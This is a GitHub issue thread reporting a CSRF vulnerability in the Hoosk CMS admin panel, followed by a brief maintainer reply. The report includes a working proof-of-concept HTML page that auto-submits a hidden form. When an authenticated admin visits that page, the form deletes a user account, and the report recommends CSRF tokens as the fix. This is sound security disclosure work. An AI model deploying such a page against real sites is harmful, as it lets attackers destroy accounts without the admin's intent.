### ISSUE TITLE
CSRF issue that allows attacker to delete an account

### ISSUE THREAD

**Issue by tclan126** [havok89/Hoosk#53]
Hi,bro.I also find an csrf issue in admin page.

When attacker induce authenticated admin user to a malicious web page, any accounts can be deleted without admin user's intention.

how to reproduce the issue.
1. Login to admin page.(/admin)
2. Keep login and access the html it has following content

```html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://demo.hoosk.org/admin/users/delete/userid" method="POST">
      <input type="hidden" name="deleteid" value="userid" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```

userid is very easy to guess.

3.And account userid = `userid` is delete without admin user's intention.

how to fix this issue.
set csrf token to protect delete function.

**Comment by havok89** [comment]
Thanks for the issues you raised. I'm finally getting time to work on this now lol

**Comment by tclan126** [comment]
you're welcome bro!
